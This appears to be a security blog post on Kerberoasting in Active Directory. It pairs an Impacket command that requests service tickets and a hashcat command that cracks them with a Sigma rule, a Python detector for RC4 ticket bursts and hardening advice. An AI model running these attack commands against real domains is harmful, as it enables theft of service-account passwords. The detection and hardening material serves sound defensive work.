Red Team / Blue Team | 12 min read | March 18, 2026
Kerberoasting From Both Sides: Attack Execution and Detection With Elastic SIEM
A deep dive into how Kerberoasting works under the hood, step-by-step execution against a lab AD environment, and the exact Sigma rules to detect it in production.
Tags: Active Directory, Kerberos, SIEM, Sigma, Red Team
## What is Kerberoasting?
Kerberoasting is a post-exploitation technique that targets Kerberos service account tickets. Any authenticated domain user can request a Ticket Granting Service (TGS) ticket for any registered SPN, and the service portion of that ticket is encrypted with a key derived from the service account's password (for RC4-HMAC, that key is the account's NTLM hash). The attacker takes the ticket offline and cracks it; no further interaction with the domain controller is needed, which is why the request itself is the only thing a defender gets to see.
## The Attack
```bash
# 1. Enumerate SPNs with Impacket
python3 GetUserSPNs.py CORP.LOCAL/jdoe:Password1 -request
# 2. Crack with Hashcat
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt --force
```
## Detection with Sigma
```yaml
title: Kerberoasting TGS Request
status: stable
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4769
    TicketEncryptionType: 0x17   # RC4-HMAC: legacy, unusual in modern AD
    Status: 0x0                  # ticket was actually issued
  filter_computer:
    # Computer accounts (names ending in '$') are not Kerberoasting targets;
    # the attack goes after user accounts that carry an SPN, so exclude them.
    ServiceName|endswith: '$'
  condition: selection and not filter_computer
falsepositives:
  - Legacy applications using RC4
level: high
```
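To see what the rule actually fires on, here is an added example (not code from the original post): it applies the same logic in Python to constructed 4769 events with Sigma-style field names (RC4 0x17, Status 0x0, service name not a computer account), and goes one step further than the rule by flagging the burst pattern typical of a roast, one account obtaining tickets for several distinct services within a short window. Field values, account names and the window/threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample 4769 events (hypothetical data, Sigma-style field names).
EVENTS = [
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.50", "ts": "2026-03-18T10:00:01"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_http",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.50", "ts": "2026-03-18T10:00:02"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.50", "ts": "2026-03-18T10:00:03"},
    # Computer-account ticket: RC4, but filtered out (name ends in '$').
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.50", "ts": "2026-03-18T10:00:04"},
    # Ordinary AES256 (0x12) ticket from another user: not selected.
    {"EventID": 4769, "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.0.0.77", "ts": "2026-03-18T10:05:00"},
    # Failed RC4 request (non-zero Status): no ticket issued, not selected.
    {"EventID": 4769, "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "svc_http",
     "TicketEncryptionType": "0x17", "Status": "0x1b", "IpAddress": "10.0.0.77", "ts": "2026-03-18T10:05:01"},
]

def matches_rule(ev):
    """Selection (4769, RC4, success) minus the computer-account filter."""
    selection = (ev["EventID"] == 4769 and ev["TicketEncryptionType"].lower() == "0x17"
                 and ev["Status"] == "0x0")
    filter_computer = ev["ServiceName"].endswith("$")
    return selection and not filter_computer

def kerberoast_bursts(events, window_s=60, min_services=3):
    """Map requester -> set of services for accounts that obtained RC4 tickets
    for at least min_services distinct services within window_s seconds."""
    hits = sorted((e for e in events if matches_rule(e)), key=lambda e: e["ts"])
    per_user = defaultdict(list)
    for e in hits:
        per_user[e["TargetUserName"]].append(e)
    alerts = {}
    for user, evs in per_user.items():
        for i, start in enumerate(evs):          # slide a window over this user's hits
            t0 = datetime.fromisoformat(start["ts"])
            in_window = [x for x in evs[i:]
                         if datetime.fromisoformat(x["ts"]) - t0 <= timedelta(seconds=window_s)]
            services = {x["ServiceName"] for x in in_window}
            if len(services) >= min_services:
                alerts[user] = services
                break
    return alerts
```

Running it over the sample flags only jdoe (three distinct RC4 service tickets in two seconds); the computer-account, AES and failed requests all drop out before the burst check.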
## Hardening
- Set `msDS-SupportedEncryptionTypes = 24` (AES128+AES256) on service accounts.
- Enforce long, random passwords (25+ chars) for service accounts via LAPS or a PAM solution.
- Monitor Event ID 4769 for requests against unusual service accounts, or for requests originating from non-admin source IPs.